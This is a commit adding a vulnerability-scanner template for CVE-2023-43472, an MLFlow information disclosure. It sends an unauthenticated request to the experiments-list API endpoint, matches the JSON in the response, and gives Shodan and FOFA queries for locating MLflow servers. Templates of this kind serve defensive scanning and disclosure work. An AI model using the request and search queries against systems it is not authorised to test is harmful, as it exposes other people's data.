Create CVE-2023-43472.yaml

patch-4
Ritik Chaddha 2024-06-07 16:16:45 +05:30 committed by GitHub
parent f559aeaeb9
commit c9e461dd10
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2023-43472
info:
name: MLFlow < 2.8.1 - Sensitive Information Disclosure
author: ritikchaddha
severity: high
description: |
An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.
impact: |
An attacker can access sensitive information stored in MLFlow.
remediation: |
Upgrade MLFlow to a version that has patched CVE-2023-43472.
reference:
- https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security
- https://nvd.nist.gov/vuln/detail/CVE-2023-43472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-43472
epss-score: 0.00116
epss-percentile: 0.44809
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query: app="MLflow"
tags: cve,cve2023,mflow,exposure
http:
- method: GET
path:
- "{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "experiment_id\":", "artifact_location\":", "lifecycle_stage\":")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and